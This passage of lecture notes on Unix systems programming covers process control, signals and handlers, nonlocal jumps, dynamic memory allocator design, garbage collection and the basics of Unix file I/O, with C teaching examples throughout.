  for (i = 0; i < N; i++) { /* Parent */
    pid_t wpid = wait(&child_status);
  if (WIFEXITED(child_status))
    printf("Child %d terminated with exit status %d\n", wpid, WEXITSTATUS(child_status));
  else
    printf("Child %d terminate abnormally\n", wpid);
  }
}

waitpid: Waiting for a Specific Process

pid_t waitpid(pid_t pid, int &status, int options)
- Suspends current process until specific process terminates

void fork11() {
  pid_t pid[N];
  int i;
  int child_status;

  for (i = 0; i < N; i++)
    if ((pid[i] = fork()) == 0)
      exit(100+i); /* Child */
  for (i = N-1; i >= 0; i--) {
    pid_t wpid = waitpid(pid[i], &child_status, 0);
    if (WIFEXITED(child_status))
      printf("Child %d terminated with exit status %d\n", wpid, WEXITSTATUS(child_status));
    else
      printf("Child %d terminate abnormally\n", wpid);
    }
}

execve: Loading and Running Programs

int execve(char *filename, char *argv[], char *envp[])
Loads and runs in the current process:
- Executable file filename
  - Can be object file or script file beginning with #!interpreter
- ...with argument list argv
  - By convention argv[0] == filename
- ...and environment variable list envp
  - name=value strings (e.g., USER=root)
  - getenv, putenv, printenv
Overwrites code, data, and stack
- Retains PID, open files and signal context
Called once and never returns
- ...except if there is an error

Structure of the stack when a new program starts

Signals

Linux Process Hierarchy

:::tip You can view the hierarchy using the pstree command. :::

Shell Programs

A shell is an application program that runs programs on behalf of the user
- sh: Original Unix shell (Stephen Bourne, AT&T Bell Labs, 1977)
- csh/tcsh: BSD Unix C shell
- bash: "Bourne-Again" Shell (default Linux shell)
Execution is a sequence of read/evaluate steps

int main() {
  char cmdline[MAXLINE]; /* command line */

  while (1) {
    /* read */
    printf("> ");
    fgets(cmdline, MAXLINE, stdin);

    if (feof(stdin))
      exit(0);

    /* evaluate */
    eval(cmdline);
  }
}

void eval(char *cmdline) {
  char *argv[MAXARGS]; /* Argument list execve() */
  char buf[MAXLINE];   /* Holds modified command line */
  int bg;              /* Should the job run in bg or fg? */
  pid_t pid;           /* Process id */

  strcpy(buf, cmdline);
  bg = parseline(buf, argv);

  if (argv[0] == NULL)
    return; /* Ignore empty lines */

  if (!builtin_command(argv)) {
    if ((pid = Fork()) == 0) { /* Child runs user job */
      if (execve(argv[0], argv, environ) < 0) {
        printf("%s: Command not found.\n", argv[0]);
        exit(0);
      }
    }

    /* Parent waits for foreground job to terminate */
    if (!bg) {
      int status;
      if (waitpid(pid, &status, 0) < 0)
        unix_error("waitfg: waitpid error");
    }
    else
      printf("%d %s", pid, cmdline);
  }
  return;
}

Problem with Simple Shell Example

Our example shell correctly waits for and reaps foreground jobs
But what about background jobs ?
- Will become zombies when they terminate
- Will never be reaped because shell (typically) will not terminate
- Will create a memory leak that could run the kernel out of memory

Solution: Exceptional Control Flow

The kernel will interrupt regular processing to alert us when a background process completes
In Unix, the alert mechanism is called a signal

Signals

A signal is a small message that notifies a process that an event of some type has occurred in the system
- Akin to exceptions and interrupts
- Sent from the kernel (sometimes at the request of another process) to a process
- Signal type is identified by small integer ID's (1-30)
- Only information in a signal is its ID and the fact that it arrived

ID	Name	Default Action	Corresponding Event
2	SIGINT	Terminate	User typed Ctrl-C
9	SIGKILL	Terminate	Kill program (cannot override or ignore)
11	SIGSEGV	Terminate & Dump	Segmentation violation
14	SIGALARM	Terminate	Timer signal
17	SIGCHLD	Ignore	Child stopped or terminated

Sending a Signal

Kernel sends (delivers) a signal to a destination process by updating some state in the context of the destination process
Kernel sends a signal for one of the following reasons:
- Kernel has detected a system event such as divide-by-zero (SIGFPE) or the termination of a child process (SIGCHLD)
- Another process has invoked the kill system call to explicitly request the kernel to send a signal to the destination process

Receiving a Signal

A destination process receives a signal when it is forced by the kernel to react in some way to the delivery of the signal
Some possible ways to react:
- Ignore the signal (do nothing)
- Terminate the process (with optional core dump)
- Catch the signal by executing a user-level function called signal handler
  - Akin to a hardware exception handler being called in response to an asynchronous interrupt:

Pending and Blocked Signals

A signal is pending if sent but not yet received
- There can be at most one pending signal of any particular type
- Signals are not queued
  - For each signal type, one bit indicates whether or not signal is pending
  - Thus at most one pending signal of any particular type
  - Then subsequent signals of the same type that are sent to that process are discarded
A process can block the receipt of certain signals
- Blocked signals can be delivered, but will not be received until the signal is unblocked
A pending signal is received at most once

Pending/Blocked Bits

Kernel maintains pending and blocked bit vectors in the context of each process
- pending: represents the set of pending signals
  - Kernel sets bit $k$ in pending when a signal of type $k$ is delivered
  - Kernel clears bit $k$ in pending when a signal of type $k$ is received
- blocked: represents the set of blocked signals
  - Can be set and cleared by using the sigprocmask function
  - Also referred to as the signal mask

Sending Signals

Process Groups

Every process belongs to exactly one process group

getpgrp() Return process group of current process
setpgid() Change process group of a process

/bin/kill Program

/bin/kill program sends arbitrary signal to a process or process group
Examples
- /bin/kill –9 24818 Send SIGKILL to process 24818
- /bin/kill –9 –24817 Send SIGKILL to every process in process group 24817

linux> ./forks 16
Child1: pid=24818 pgrp=24817
Child2: pid=24819 pgrp=24817
linux> ps
PID TTY TIME CMD
24788 pts/2 00:00:00 tcsh
24818 pts/2 00:00:02 forks
24819 pts/2 00:00:02 forks
24820 pts/2 00:00:00 ps
linux> /bin/kill -9 -24817
linux> ps
PID TTY TIME CMD
24788 pts/2 00:00:00 tcsh
24823 pts/2 00:00:00 ps
linux>

From the Keyboard

Typing Ctrl-C (Ctrl-Z) causes the kernel to send a SIGINT (SIGTSTP) to every job in the foreground process group
- SIGINT – default action is to terminate each process
- SIGTSTP – default action is to stop (suspend) each process

Example of Ctrl-C and Ctrl-Z

STAT (process state) Legend:
- First letter:
  - S: Sleeping
  - T: Stopped
  - R: Running
- Second letter:
  - s: Session leader
  - +: Foreground proc group

bluefish> ./forks 17
Child: pid=28108 pgrp=28107
Parent: pid=28107 pgrp=28107
<types ctrl-z>
Suspended
bluefish> ps w
PID TTY STAT TIME COMMAND
27699 pts/8 Ss 0:00 -tcsh
28107 pts/8 T 0:01 ./forks 17
28108 pts/8 T 0:01 ./forks 17
28109 pts/8 R+ 0:00 ps w
bluefish> fg
./forks 17
<types ctrl-c>
bluefish> ps w
PID TTY STAT TIME COMMAND
27699 pts/8 Ss 0:00 -tcsh
28110 pts/8 R+ 0:00 ps w

kill Function

void fork12() {
  pid_t pid[N];
  int i;
  int child_status;

  for (i = 0; i < N; i++)
    if ((pid[i] = fork()) == 0) {
      /* Child: Infinite Loop */
      while(1)
        ;
    }

  for (i = 0; i < N; i++) {
    printf("Killing process %d\n", pid[i]);
    kill(pid[i], SIGINT);
  }

  for (i = 0; i < N; i++) {
    pid_t wpid = wait(&child_status);
    if (WIFEXITED(child_status))
      printf("Child %d terminated with exit status %d\n", wpid, WEXITSTATUS(child_status));
    else
      printf("Child %d terminated abnormally\n", wpid);
  }
}

Receiving Signals

Suppose kernel is returning from an exception handler and is ready to pass control to process $p$

:::important All context switches are initiated by calling some exception handler. :::

Kernel computes pnb = pending & ~blocked
- The set of pending nonblocked signals for process $p$
If pnb == 0
- Pass control to next instruction in the logical flow for $p$
Else
- Choose least nonzero bit $k$ in pnb and force process $p$ to receive signal $k$
- The receipt of the signal triggers some action by $p$
- Repeat for all nonzero $k$ in pnb
- Pass control to next instruction in logical flow for $p$

Default Actions

Each signal type has a predefined default action, which is one of:
- The process terminates
- The process terminates and dumps core
- The process stops until restarted by a SIGCONT signal
- The process ignores the signal

Installing Signal Handlers

The signal function modifies the default action associated with the receipt of signal signum:
- handler_t *signal(int signum, handler_t *handler)
Different values for handler:
- SIG_IGN: Ignore signals of type signum
- SIG_DFL: Revert to the default action on receipt of signals of type signum
- Otherwise, handler is the address of a user-level signal handler
  - Called when process receives signal of type signum
  - Referred to as "installing" the handler
  - Executing handler is called "catching" or "handling" the signal
  - When the handler executes its return statement, control passes back to instruction in the control flow of the process that was interrupted by receipt of the signal

/* SIGINT handler */
void sigint_handler(int sig) {
  printf("So you think you can stop the bomb with ctrl-c, do you?\n");
  sleep(2);
  printf("Well...");
  fflush(stdout);
  sleep(1);
  printf("OK. :-)\n");
  exit(0);
}

int main() {
  /* Install the SIGINT handler */
  if (signal(SIGINT, sigint_handler) == SIG_ERR)
    unix_error("signal error");

  /* Wait for the receipt of a signal */
  pause();

  return 0;
}

Signals Handlers as Concurrent Flows

A signal handler is a separate logical flow (not process) that runs concurrently with the main program

Nested Signal Handlers

Handlers can be interrupted by other handlers

Blocking and Unblocking Signals

Implicit blocking mechanism
- Kernel blocks any pending signals of type currently being handled
- E.g., A SIGINT handler can't be interrupted by another SIGINT
Explicit blocking and unblocking mechanism
- sigprocmask function
Supporting functions
- sigemptyset – Create empty set
- sigfillset – Add every signal number to set
- sigaddset – Add signal number to set
- sigdelset – Delete signal number from set

Temporarily Blocking Signals

sigset_t mask, prev_mask;

sigemptyset(&mask);
sigaddset(&mask, SIGINT);

/* Block SIGINT and save previous blocked set */
sigprocmask(SIG_BLOCK, &mask, &prev_mask);

/* Code region that will not be interrupted by SIGINT */

/* Restore previous blocked set, unblocking SIGINT */
sigprocmask(SIG_SETMASK, &prev_mask, NULL);

Safe Signal Handling Guidelines

Handlers are tricky because they are concurrent with main program and share the same global data structures. Shared data structures can become corrupted.

G0: Keep your handlers as simple as possible
- E.g., Set a global flag and return
G1: Call only async-signal-safe functions in your handlers
- printf, sprintf, malloc, and exit are not safe !
G2: Save and restore errno on entry and exit
- So that other handlers don't overwrite your value of errno
G3: Protect accesses to shared data structures by temporarily blocking all signals
- To prevent possible corruption
G4: Declare global variables as volatile
- To prevent compiler from storing them in a register
G5: Declare global flags as volatile sig_atomic_t
- flag: variable that is only read or written (e.g. flag = 1, not flag++)
- Flag declared this way does not need to be protected like other globals

Async-Signal-Safety

Function is async-signal-safe if either reentrant (e.g., all variables stored on stack frame) or non-interruptible by signals
Posix guarantees 117 functions to be async-signal-safe
- Source: man 7 signal
- Popular functions on the list:
  - _exit, write, wait, waitpid, sleep, kill
- Popular functions that are not on the list:
  - printf, sprintf, malloc, exit
  - Unfortunate fact: write is the only async-signal-safe output function

Correct Signal Handling Example

You can't use signals to count events, such as children terminating.

#define N 5

int ccount = 0;

void child_handler(int sig) {
  int olderrno = errno;
  pid_t pid;

  if ((pid = wait(NULL)) < 0)
    Sio_error("wait error");

  ccount--;
  Sio_puts("Handler reaped child ");
  Sio_putl((long)pid);
  Sio_puts(" \n");
  sleep(1);
  errno = olderrno;
}

void fork14() {
  pid_t pid[N];
  int i;
  ccount = N;

  signal(SIGCHLD, child_handler);

  for (i = 0; i < N; i++) {
    if ((pid[i] = fork()) == 0) {
      sleep(1);
      exit(0); /* Child exits */
    }
  }

  while (ccount > 0) /* Parent spins */
    ;
}

whaleshark> ./forks 14
Handler reaped child 23240
Handler reaped child 23241

Must wait for all terminated child processes. Put wait in a loop to reap all terminated children.

void child_handler2(int sig) {
  int olderrno = errno;
  pid_t pid;

  while ((pid = wait(NULL)) > 0) {
    ccount--;
    Sio_puts("Handler reaped child ");
    Sio_putl((long)pid);
    Sio_puts(" \n");
  }
  if (errno != ECHILD)
    Sio_error("wait error");
  errno = olderrno;
}

whaleshark> ./forks 15
Handler reaped child 23246
Handler reaped child 23247
Handler reaped child 23248
Handler reaped child 23249
Handler reaped child 23250
whaleshark>

Portable Signal Handling

Ugh ! Different versions of Unix can have different signal handling semantics
- Some older systems restore action to default after catching signal
- Some interrupted system calls can return with errno == EINTR
- Some systems don't block signals of the type being handled
Solution: sigaction

handler_t *signal(int signum, handler_t *handler) {
  struct sigaction action, old_action;

  action.sa_handler = handler;
  sigemptyset(&action.sa_mask); /* Block sigs of type being handled */
  action.sa_flags = SA_RESTART; /* Restart syscalls if possible */

  if (sigaction(signum, &action, &old_action) < 0)
    unix_error("Signal error");
  return (old_action.sa_handler);
}

Synchronizing Flows to Avoid Races

Simple shell with a subtle synchronization error because it assumes parent runs before child

int main(int argc, char **argv) {
  int pid;
  sigset_t mask_all, prev_all;

  sigfillset(&mask_all);
  signal(SIGCHLD, handler);
  initjobs(); /* Initialize the job list */

  while (1) {
    if ((pid = Fork()) == 0) { /* Child */
      execve("/bin/date", argv, NULL);
    }
    sigprocmask(SIG_BLOCK, &mask_all, &prev_all); /* Parent */
    addjob(pid); /* Add the child to the job list */
    sigprocmask(SIG_SETMASK, &prev_all, NULL);
  }
  exit(0);
}

void handler(int sig) {
  int olderrno = errno;
  sigset_t mask_all, prev_all;
  pid_t pid;

  sigfillset(&mask_all);
  while ((pid = waitpid(-1, NULL, 0)) > 0) { /* Reap child */
    sigprocmask(SIG_BLOCK, &mask_all, &prev_all);
    deletejob(pid); /* Delete the child from the job list */
    sigprocmask(SIG_SETMASK, &prev_all, NULL);
  }
  if (errno != ECHILD)
    Sio_error("waitpid error");
  errno = olderrno;
}

Corrected Shell Program without Race

int main(int argc, char **argv) {
  int pid;
  sigset_t mask_all, mask_one, prev_one;

  sigfillset(&mask_all);
  sigemptyset(&mask_one);
  sigaddset(&mask_one, SIGCHLD);
  signal(SIGCHLD, handler);
  initjobs(); /* Initialize the job list */

  while (1) {
    sigprocmask(SIG_BLOCK, &mask_one, &prev_one); /* Block SIGCHLD */
    if ((pid = Fork()) == 0) { /* Child process */
      sigprocmask(SIG_SETMASK, &prev_one, NULL); /* Unblock SIGCHLD */
      execve("/bin/date", argv, NULL);
    }
    sigprocmask(SIG_BLOCK, &mask_all, NULL); /* Parent process */
    addjob(pid); /* Add the child to the job list */
    sigprocmask(SIG_SETMASK, &prev_one, NULL); /* Unblock SIGCHLD */
  }
  exit(0);
}

Explicitly Waiting for Signals

Handlers for program explicitly waiting for SIGCHLD to arrive

volatile sig_atomic_t pid;

void sigchld_handler(int s) {
  int olderrno = errno;
  pid = waitpid(-1, NULL, 0); /* Main is waiting for nonzero pid */
  errno = olderrno;
}

void sigint_handler(int s) {}

Similar to a shell waiting for a foreground job to terminate:

int main(int argc, char **argv) {
  sigset_t mask, prev;

  signal(SIGCHLD, sigchld_handler);
  signal(SIGINT, sigint_handler);
  sigemptyset(&mask);
  sigaddset(&mask, SIGCHLD);

  while (1) {
    sigprocmask(SIG_BLOCK, &mask, &prev); /* Block SIGCHLD */
    if (fork() == 0) /* Child */
      exit(0);

    /* Parent */
    pid = 0;
    sigprocmask(SIG_SETMASK, &prev, NULL); /* Unblock SIGCHLD */

    /* Wait for SIGCHLD to be received (wasteful!) */
    while (!pid)
      ;

    /* Do some work after receiving SIGCHLD */
    printf(".");
  }
  exit(0);
}

Program is correct, but very wasteful

Other options:

while (!pid) /* Race! */
  pause();

while (!pid) /* Too slow! */
  sleep(1);

Solution: sigsuspend

Waiting for Signals with sigsuspend

int sigsuspend(const sigset_t *mask)
- It'll temporarily use const sigset_t *mask instead of currently signal block mask, then hang on program. Once catch signal, revert the signal block mask to original one

int main(int argc, char **argv) {
  sigset_t mask, prev;

  signal(SIGCHLD, sigchld_handler);
  signal(SIGINT, sigint_handler);
  sigemptyset(&mask);
  sigaddset(&mask, SIGCHLD);

  while (1) {
    sigprocmask(SIG_BLOCK, &mask, &prev); /* Block SIGCHLD */
    if (fork() == 0) /* Child */
      exit(0);

    /* Wait for SIGCHLD to be received */
    pid = 0;
    while (!pid)
      sigsuspend(&prev);

    /* Optionally unblock SIGCHLD */
    sigprocmask(SIG_SETMASK, &prev, NULL);
    /* Do some work after receiving SIGCHLD */
    printf(".");
  }
  exit(0);
}

Nonlocal Jumps

Powerful (but dangerous) user-level mechanism for transferring control to an arbitrary location
- Controlled to way to break the procedure call / return discipline
- Useful for error recovery and signal handling
int setjmp(jmp_buf buf)
- Must be called before longjmp
- Identifies a return site for a subsequent longjmp
- Called once, returns one or more times
- Implementation:
  - Remember where you are by storing the current register context, stack pointer, and PC value in buf
  - Return 0
int sigsetjmp(sigjmp_buf buf, int save);
- Similar as setjmp, save indicates whether save signal block mask (can only be 0 (don't save) or 1 (save))
void longjmp(jmp_buf buf, int val)
- Meaning:
  - return from the setjmp remembered by jump buffer buf again...
  - ...this time returning val instead of 0 (if val is 0, force return 1)
- Called after setjmp
- Called once, but never returns
- Implementation:
  - Restore register context, stack pointer, base pointer, PC value from jump buffer buf
  - Set %eax to val
  - Jump to the location indicated by the PC stored in jump buf buf
void siglongjmp(sigjmp_buf buf, int val);
- Same as longjmp, just using with sigsetjmp

setjmp/longjmp Example

Goal: return directly to original caller from a deeply-nested function

jmp_buf buf;

int error1 = 0;
int error2 = 1;

void foo(void), bar(void);

int main() {
  switch(setjmp(buf)) {
  case 0:
    foo();
    break;
  case 1:
    printf("Detected an error1 condition in foo\n");
    break;
  case 2:
    printf("Detected an error2 condition in foo\n");
    break;
  default:
    printf("Unknown error condition in foo\n");
  }
  exit(0);
}

/* Deeply nested function foo */
void foo(void) {
  if (error1)
    longjmp(buf, 1);
  bar();
}

void bar(void) {
  if (error2)
    longjmp(buf, 2);
}

// Output: Detected an error2 condition in foo

sigsetjmp/siglongjmp Example

This program restarts itself when Ctrl-C'd:

sigjmp_buf buf;

void handler(int sig) {
  siglongjmp(buf, 1);
}

int main() {
  if (!sigsetjmp(buf, 1)) {
    signal(SIGINT, handler);
    Sio_puts("starting\n");
  }
  else
    Sio_puts("restarting\n");

  while(1) {
    sleep(1);
    Sio_puts("processing...\n");
  }
  exit(0); /* Control never reaches here */
}

Limitations of Nonlocal Jumps

Works within stack discipline
- Can only long jump to environment of function that has been called but not yet completed

jmp_buf env;

P1() {
  if (setjmp(env)) {
    /* Long Jump to here */
  } else {
    P2();
  }
}
P2() { . . . P2(); . . . P3(); }
P3() {
  longjmp(env, 1);
}

jmp_buf env;

P1() {
  P2();
  P3();
}

P2() {
  if (setjmp(env)) {
    /* Long Jump to here */
  }
}

P3() {
  longjmp(env, 1);
}

Virtual Memory

TODO

Dynamic Memory Allocation

Assumptions for following examples:
- Memory is word addressed
- Words are int-sized

Basic Concepts

Programmers use dynamic memory allocators (such as malloc) to acquire virtual memory at runtime
- For data structures whose size is only known at runtime
Dynamic memory allocators manage an area of process virtual memory known as the heap

Allocator maintains heap as collection of variable sized blocks, which are either allocated or free
Types of allocators
- Explicit allocator: application allocates and frees space
  - E.g., malloc and free in C
- Implicit allocator: application allocates, but does not free space
  - E.g. garbage collection in Java, ML, and Lisp

The malloc Package

void *malloc(size_t size)
- Successful:
  - Returns a pointer to a memory block of at least size bytes aligned to an 8-byte (x86) or 16-byte (x86-64) boundary
  - If size == 0, returns NULL
- Unsuccessful: returns NULL (0) and sets errno
void free(void *p)
- Returns the block pointed at by p to pool of available memory
- p must come from a previous call to malloc or realloc
Other functions
- calloc: Version of malloc that initializes allocated block to zero
- realloc: Changes the size of a previously allocated block
- sbrk: Used internally by allocators to grow or shrink the heap

#include <stdio.h>
#include <stdlib.h>

void foo(int n) {
  int i, *p;

  /* Allocate a block of n ints */
  p = (int *)malloc(n * sizeof(int));
  if (p == NULL) {
    perror("malloc");
    exit(0);
  }

  /* Initialize allocated block */
  for (i = 0; i < n; i++)
    p[i] = i;


  /* Return allocated block to the heap */
  free(p);
}

Constrains

Applications
- Can issue arbitrary sequence of malloc and free requests
- free request must be to a malloc'd block
Allocators
- Can't control number or size of allocated blocks
- Must respond immediately to malloc requests
  - i.e., can't reorder or buffer requests
- Must allocate blocks from free memory
  - i.e., can only place allocated blocks in free memory
- Must align blocks so they satisfy all alignment requirements
  - 8-byte (x86) or 16-byte (x86-64) alignment on Linux boxes
- Can manipulate and modify only free memory
- Can't move the allocated blocks once they are malloc'd
  - i.e., compaction is not allowed

Performance Goal

Goals: maximize throughput and peak memory utilization
- These goals are often conflicting

Throughput

Given some sequence of malloc and free requests:
- $R_{0} ,R_{1} ,...,R_{k} ,...,R_{n-1}$
Throughput
- Number of completed requests per unit time
- Example:
  - 5,000 malloc calls and 5,000 free calls in 10 seconds
  - Throughput is 1,000 operations/second

Peak Memory Utilization

Given some sequence of malloc and free requests:
- $R_{0} ,R_{1} ,...,R_{k} ,...,R_{n-1}$
Def: Aggregate payload $P_{k}$
- malloc(p) results in a block with a payload of p bytes
- After request $R_{k}$ has completed, the aggregate payload $P_{k}$ is the sum of currently allocated payloads
Def: Current heap size $H_{k}$
- Assume $H_{k}$ is monotonically nondecreasing
  - i.e., heap only grows when allocator uses sbrk
Def: Peak memory utilization after $k+1$ requests
- $\displaystyle U_{k} =( max_{i\leqslant k} \ P_{i}) /H_{k}$

Fragmentation

Poor memory utilization caused by fragmentation
- internal fragmentation
- external fragmentation

Internal Fragmentation

For a given block, internal fragmentation occurs if payload is smaller than block size

Caused by
- Overhead of maintaining heap data structures
- Padding for alignment purposes
- Explicit policy decisions
  - E.g., to return a big block to satisfy a small request
Depends only on the pattern of previous requests
- Thus, easy to measure

External Fragmentation

Occurs when there is enough aggregate heap memory, but no single free block is large enough

Depends on the pattern of future requests
- Thus, difficult to measure

Implementation Issues

How do we know how much memory to free given just a pointer ?
How do we keep track of the free blocks ?
What do we do with the extra space when allocating a structure that is smaller than the free block it is placed in ?
How do we pick a block to use for allocation -- many might fit ?
How do we reinsert freed block ?

Knowing How Much to Free

Standard method
- Keep the length of a block in the word preceding the block
  - This word is often called the header field or header
- Requires an extra word for every allocated block

Keeping Track of Free Blocks

Method 1: Implicit list using length-links all blocks

Method 2: Explicit list among the free blocks using pointers

Method 3: Segregated free list
- Different free lists for different size classes
Method 4: Blocks sorted by size
- Can use a balanced tree (e.g. Red-Black tree) with pointers within each free block, and the length used as a key

Implicit List

For each block we need both size and allocation status
- Could store this information in two words: wasteful !
Standard trick
- If blocks are aligned, some low-order address bits are always 0
- Instead of storing an always-0 bit, use it as a allocated/free flag
- When reading size word, must mask out this bit

Detailed Implicit Free List Example

Payload must be double-word aligned

We have an internal fragmentation in first allocated block because of payload is only 2 words but allocated 4 words

Finding a Free Block

First fit
- Search list from beginning, choose first free block that fits:

p = start;
while ((p < end) &&  // not passed end
      ((*p & 1) ||   // already allocated
      (*p <= len)))  // too small
  p = p + (*p & -2); // goto next block (word addressed)

Can take linear time in total number of blocks (allocated and free)
In practice it can cause "splinters" at beginning of list
Next fit
- Like first fit, but search list starting where previous search finished
- Should often be faster than first fit: avoids re-scanning unhelpful blocks
- Some research suggests that fragmentation is worse
Best fit
- Search the list, choose the best free block: fits, with fewest bytes left over
- Keeps fragments small — usually improves memory utilization
- Will typically run slower than first fit

Allocating in Free Block

Splitting
- Since allocated space might be smaller than free space, we might want to split the block

void addblock(ptr p, int len) {
  int newsize = ((len + 1) >> 1) << 1; // round up to even
  int oldsize = *p & -2;               // mask out low bit
  *p = newsize | 1;                    // set new length
  if (newsize < oldsize)
    *(p+newsize) = oldsize - newsize;  // set length in remaining
}

Freeing a Block

Simplest implementation
- Need only clear the allocated flag
  - void free_block(ptr p) { *p = *p & -2 }
- But can lead to "false fragmentation"

There is enough free space, but the allocator won't be able to find it

Coalescing

Join (coalesce) with next/previous blocks, if they are free
- Coalescing with next block

void free_block(ptr p) {
  *p = *p & -2;         // clear allocated flag
  next = p + *p;        // find next block
  if ((*next & 1) == 0)
    *p = *p + *next;    // add to this block if
}                       // not allocated

But how do we coalesce with previous block ?

Bidirectional Coalescing

Boundary tags [Knuth73]
- Replicate size/allocated word at "bottom" (end) of free blocks
- Allows us to traverse the "list" backwards, but requires extra space
- Important and general technique !

Constant Time Coalescing

Case 1

Case 2

Case 3

Case 4

Disadvantages of Boundary Tags

Internal fragmentation
malloc'd blocks don't need the footer tag

Implicit Lists Summary

Implementation: very simple
Allocate cost:
- Linear time worst case
Free cost:
- Constant time worst case
- Even with coalescing
Memory usage:
- Will depend on placement policy
- First-fit, next-fit or best-fit
Not used in practice for malloc/free because of linear-time allocation
- Used in many special purpose applications
However, the concepts of splitting and boundary tag coalescing are general to all allocators

Explicit List

Explicit Free Lists

Maintain list(s) of free blocks, not all blocks
- The "next" free block could be anywhere
  - So we need to store forward/back pointers, not just sizes
- Still need boundary tags for coalescing
- Luckily we track only free blocks, so we can use payload area
Logically

Physically
- Blocks can be in any order

Allocating From Explicit Free Lists

Freeing With Explicit Free Lists

Insertion policy
- LIFO (last-in-first-out) policy
  - Insert freed block at the beginning of the free list
  - Pro: Simple and constant time
  - Con: Studies suggest fragmentation is worse than address ordered
- Address-ordered policy
  - Insert freed blocks so that free list blocks are always in address order: addr(prev) < addr(curr) < addr(next)
  - Pro: Studies suggest fragmentation is lower than LIFO
  - Con: Requires search

Freeing With a LIFO Policy (Case 1)

Insert the freed block at the root of the list

Freeing With a LIFO Policy (Case 2)

Splice out successor block, coalesce both memory blocks and insert the new block at the root of the list

Freeing With a LIFO Policy (Case 3)

Splice out predecessor block, coalesce both memory blocks, and insert the new block at the root of the list

Freeing With a LIFO Policy (Case 4)

Splice out predecessor and successor blocks, coalesce all 3 memory blocks and insert the new block at the root of the list

Explicit List Summary

Comparison to implicit list:
- Allocate is linear time in number of free blocks instead of all blocks
  - Much faster when most of the memory is full
- Slightly more complicated allocate and free since needs to splice blocks in and out of the list
- Some extra space for the links (2 extra words needed for each block)
Most common use of linked lists is in conjunction with segregated free lists
- Keep multiple linked lists of different size classes, or possibly for different types of objects

Segregated Free List

Each size class of blocks has its own free list

Often have separate classes for each small size
For larger sizes: One class for each two-power size

Seglist Allocator

Given an array of free lists, each one for some size class
To allocate a block of size n:
- Search appropriate free list for block of size m > n
- If an appropriate block is found:
  - Split block and place fragment on appropriate list (optional)
- If no block is found, try next larger class
- Repeat until block is found
If no block is found:
- Request additional heap memory from OS (using sbrk())
- Allocate block of n bytes from this new memory
- Place remainder as a single free block in largest size class
To free a block:
- Coalesce and place on appropriate list
Advantages of seglist allocators
- Higher throughput
  - log time for power-of-two size classes
- Better memory utilization
  - First-fit search of segregated free list approximates a best-fit search of entire heap
  - Extreme case: Giving each block its own size class is equivalent to best-fit

Summary of Key Allocator Policies

Placement policy
- First-fit, next-fit, best-fit, etc
- Trades off lower throughput for less fragmentation
- Interesting observation: segregated free lists
  - Approximate a best fit placement policy without having to search entire free list
Splitting policy
- When do we go ahead and split free blocks ?
- How much internal fragmentation are we willing to tolerate ?
Coalescing policy
- Immediate coalescing: Coalesce each time free is called
- Deferred coalescing: Try to improve performance of free by deferring coalescing until needed. Examples:
  - Coalesce as you scan the free list for malloc
  - Coalesce when the amount of external fragmentation reaches some threshold

Garbage Collection

Automatic reclamation of heap-allocated storage -- application never has to free

void foo() {
  int *p = malloc(128);
  return; /* p block is now garbage */
}

Common in many dynamic languages:
- Python, Ruby, Java, Perl, ML, Lisp, Mathematica
Variants ("conservative" garbage collectors) exist for C and C++
- However, cannot necessarily collect all garbage
How does the memory manager know when memory can be freed ?
- In general we cannot know what is going to be used in the future since it depends on conditionals
- But we can tell that certain blocks cannot be used if there are no pointers to them
Must make certain assumptions about pointers
- Memory manager can distinguish pointers from non-pointers
- All pointers point to the start of a block
- Cannot hide pointers (e.g., by coercing them to an int, and then back again)

Classical GC Algorithms

Mark-and-sweep collection (McCarthy, 1960)
- Does not move blocks (unless you also "compact")
Reference counting (Collins, 1960)
- Does not move blocks
Copying collection (Minsky, 1963)
- Moves blocks
Generational Collectors (Lieberman and Hewitt, 1983)
- Collection based on lifetimes
  - Most allocations become garbage very soon
  - So focus reclamation work on zones of memory recently allocated

Memory as a Graph

We view memory as a directed graph
- Each block is a node in the graph
- Each pointer is an edge in the graph
- Locations not in the heap that contain pointers into the heap are called root nodes (e.g. registers, locations on the stack, global variables)

A node (block) is reachable if there is a path from any root to that node
Non-reachable nodes are garbage (cannot be needed by the application)

Mark and Sweep Collecting

Can build on top of malloc/free package
- Allocate using malloc until you "run out of space"
When out of space:
- Use extra mark bit in the head of each block
- Mark: Start at roots and set mark bit on each reachable block
- Sweep: Scan all blocks and free blocks that are not marked

Assumptions For a Simple Implementation

Application
- new(n): returns pointer to new block with all locations cleared
- read(b, i): read location i of block b into register
- write(b, i, v): write v into location i of block b
Each block will have a header word
- Addressed as b[-1], for a block b
- Used for different purposes in different collectors
Instructions used by the Garbage Collector
- is_ptr(p): determines whether p is a pointer
- length(b): returns the length of block b, not including the header
- get_roots(): returns all the roots

Example

Mark using depth-first traversal of the memory graph

ptr mark(ptr p) {
  if (!is_ptr(p)) return;       // do nothing if not pointer
  if (markBitSet(p)) return;    // check if already marked
  setMarkBit(p);                // set the mark bit
  for (i=0; i < length(p); i++) // call mark on all words
    mark(p[i]);                 // in the block
  return;
}

Sweep using lengths to find next block

ptr sweep(ptr p, ptr end) {
  while (p < end) {
    if markBitSet(p)
      clearMarkBit();
    else if (allocateBitSet(p))
      free(p);
    p += length(p);
}

Conservative Mark & Sweep in C

A "conservative garbage collector" for C programs
- is_ptr() determines if a word is a pointer by checking if it points to an allocated block of memory
- But, in C pointers can point to the middle of a block

So how to find the beginning of the block ?
- Can use a balanced binary tree to keep track of all allocated blocks (key is start-of-block)
- Balanced-tree pointers can be stored in header (use two additional words)

System-Level I/O

Unix I/O

A Linux file is a sequence of m bytes
All I/O devices are represented as files
Even the kernel is represented as a file
- /boot/vmlinuz-3.13.0-55-generic: kernel image
- /proc: kernel data structures

File Types

Each file has a type indicating its role in the system
- Regular file: Contains arbitrary data
- Directory: Index for a related group of files
- Socket: For communicating with a process on another machine
And more file types...
- Named pipes (FIFOs)
- Symbolic links
- Character and block devices
- ...

Regular Files

A regular file contains arbitrary data
Applications open distinguish between text files and binary files
- Text files are regular files with only ASCII or Unicode characters
- Binary files are everything else
  - e.g., object files, JPEG images
- Kernel doesn't know the difference !
Text file is sequence of text lines
- Text line is sequence of chars terminated by newline char \n
  - Newline is 0x0a, same as ASCII line feed character LF
End Of Line (EOL) indicators in different systems:
- Linux and Mac OS: \n (0x0a)
  - Line Feed (LF)
- Windows and Internet protocols: \r\n (0x0d 0x0a)
  - Carriage return (CR) followed by line feed (LF)

Directories

Directory consists of an array of links
- Each link maps a filename to a file
Each directory contains at least two entries
- . (dot) is a link to itself
- .. (dot dot) is a link to the parent directory

Directory Hierarchy

